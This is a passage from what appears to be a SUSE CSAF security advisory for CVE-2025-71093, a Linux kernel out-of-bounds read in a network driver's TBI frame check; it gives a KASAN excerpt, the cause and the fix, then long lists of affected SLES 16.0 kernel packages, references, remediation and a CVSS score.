2048\nThe buggy address is located 1620 bytes to the right of\n 2048-byte region [ffff888014114000, ffff888014114800]\nThe buggy address belongs to the physical page:\npage:ffffea0000504400 refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x14110\nhead:ffffea0000504400 order:3 compound_mapcount:0 compound_pincount:0\nflags: 0x100000000010200(slab|head|node=0|zone=1)\nraw: 0100000000010200 0000000000000000 dead000000000001 ffff888013442000\nraw: 0000000000000000 0000000000080008 00000001ffffffff 0000000000000000\npage dumped because: kasan: bad access detected\n==================================================================\n\nThis happens because the TBI check unconditionally dereferences the last\nbyte without validating the reported length first:\n\n\tu8 last_byte = *(data + length - 1);\n\nFix by rejecting the frame early if the length is zero, or if it exceeds\nadapter-\u003erx_buffer_len. This preserves the TBI workaround semantics for\nvalid frames and prevents touching memory beyond the RX buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71093",
"url": "https://www.suse.com/security/cve/CVE-2025-71093"
},
{
"category": "external",
"summary": "SUSE Bug 1256777 for CVE-2025-71093",
"url": "https://bugzilla.suse.com/1256777"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
